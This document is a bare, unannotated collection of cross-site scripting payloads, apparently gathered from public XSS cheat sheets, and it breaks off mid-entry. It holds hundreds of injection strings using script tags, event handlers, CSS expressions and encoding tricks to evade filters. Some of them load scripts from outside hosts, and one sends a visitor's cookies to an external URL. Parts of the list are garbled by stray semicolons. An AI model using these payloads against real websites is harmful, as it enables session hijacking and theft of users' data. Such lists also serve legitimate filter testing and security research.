href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
'';!--"<XSS>=&{()} '>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script> <script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font style='color:expression(alert(document.cookie))'> <img src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script> <body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("Bonjour !"); <div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> "><script alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '">><marquee><h1>XSS</h1></marquee> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> <script>var var = 1; alert(var)</script> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> " onfocus=alert(document.domain) "> <" <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())> </script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');"> '"></title><script>alert(1111)</script> </textarea>'"><script>alert(document.cookie)</script> '""><script language="JavaScript"> alert('X \nS \nS');</script> </script></script><<<<script><>>>><<<script>alert(123)</script> <html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> '></select><script>alert(123)</script> '>"><script src = 'http://www.site.com/XSS.js'></script> }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> <SCRIPT>document.write("XSS");</SCRIPT> a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='><script>alert("xss")</script> <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /><script>alert('xss');</script> <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? '); alert('xss'); var x=' \\'); alert(\'xss\');var x=\' //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> <img src="svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> </body> </html> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT> alert(ìXSSî); </SCRIPT> <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG SRC="javascript:alert('XSS');"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IFRAME SRC=îhttp://hacker-site.com/xss.htmlî> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <TABLE BACKGROUND="javascript:alert('XSS')"> <TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">&apos;><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> &apos;&apos;;!--"<XSS>=&{()} <SCRIPT>alert(&apos;XSS&apos;)</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert(&apos;XSS&apos;);//"> <BGSOUND SRC="javascript:alert(&apos;XSS&apos;);"> <BODY BACKGROUND="javascript:alert(&apos;XSS&apos;);"> <BODY ONLOAD=alert(&apos;XSS&apos;)> <DIV STYLE="background-image: url(javascript:alert(&apos;XSS&apos;))"> <DIV STYLE="background-image: url(&#1;javascript:alert(&apos;XSS&apos;))"> <DIV STYLE="width: expression(alert(&apos;XSS&apos;));"> <FRAMESET><FRAME SRC="javascript:alert(&apos;XSS&apos;);"></FRAMESET> <IFRAME SRC="javascript:alert(&apos;XSS&apos;);"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert(&apos;XSS&apos;);"> <IMG SRC="javascript:alert(&apos;XSS&apos;);"> <IMG SRC=javascript:alert(&apos;XSS&apos;)> <IMG DYNSRC="javascript:alert(&apos;XSS&apos;);"> <IMG LOWSRC="javascript:alert(&apos;XSS&apos;);"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE=&apos;no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC=&apos;vbscript:msgbox("XSS")&apos;> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(&apos;XSS&apos;);"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(&apos;XSS&apos;)></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(&apos;XSS&apos;);")";eval(a+b+c+d); <STYLE TYPE="text/javascript">alert(&apos;XSS&apos;);</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))"> <XSS STYLE="xss:expression(alert(&apos;XSS&apos;))"> <STYLE>.XSS{background-image:url("javascript:alert(&apos;XSS&apos;)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert(&apos;XSS&apos;)")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert(&apos;XSS&apos;);"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import&apos;http://ha.ckers.org/xss.css&apos;;</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert(&apos;XSS&apos;)"></TABLE> <TABLE><TD BACKGROUND="javascript:alert(&apos;XSS&apos;)"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(&apos;XSS&apos;);">]]> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(&apos;XSS&apos;)"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!--[if gte IE 4]>               <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(&apos;XSS&apos;)</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo &apos;<SCRIPT SRC&apos;"--><!--#exec cmd="/bin/echo &apos;=http://ha.ckers.org/xss.js></SCRIPT>&apos;"--> <? echo(&apos;<SCR)&apos;; <BR SIZE="&{alert(&apos;XSS&apos;)}"> <IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, &apos;XSS&apos;")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <DIV STYLE="background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4- \";alert(&apos;XSS&apos;);// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port&apos;\ja\vasc\ript:alert("XSS")&apos;;</STYLE> <IMG SRC="jav ascript:alert(&apos;XSS&apos;);"> <IMG SRC="jav&#x09;ascript:alert(&apos;XSS&apos;);"> <IMG SRC="jav&#x0A;ascript:alert(&apos;XSS&apos;);"> <IMG SRC="jav&#x0D;ascript:alert(&apos;XSS&apos;);"> <IMGSRC="javascript:alert(&apos;XSS&apos;)"> perl -e &apos;print "<IMG SRC=java\0script:alert("XSS")>";&apos;> out perl -e &apos;print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";&apos; > out <IMG SRC=" &#14;  javascript:alert(&apos;XSS&apos;);"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert(&apos;XSS&apos;)" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" &apos;&apos; SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a=&apos;>&apos;" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">&apos;>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6&#09;6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location=&apos;http://www.google.com/&apos;">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC=" &#14; javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; ';';;!--";<;XSS>;=&;{()} <;SCRIPT>;alert(';XSS';)<;/SCRIPT>; <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; <;BASE HREF=";javascript:alert(';XSS';);//";>; <;BGSOUND SRC=";javascript:alert(';XSS';);";>; <;BODY BACKGROUND=";javascript:alert(';XSS';);";>; <;BODY ONLOAD=alert(';XSS';)>; <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; <;DIV STYLE=";width: expression(alert(';XSS';));";>; <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=javascript:alert(';XSS';)>; <;IMG DYNSRC=";javascript:alert(';XSS';);";>; <;IMG LOWSRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS <;IMG SRC=';vbscript:msgbox(";XSS";)';>; <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; <;IMG SRC=";livescript:[code]";>; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; <;IMG SRC=";mocha:[code]";>; <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;eval(a+b+c+d); <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; <;XSS STYLE=";xss:expression(alert(';XSS';))";>; <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; <;META HTTP-EQUIV=";Link"; 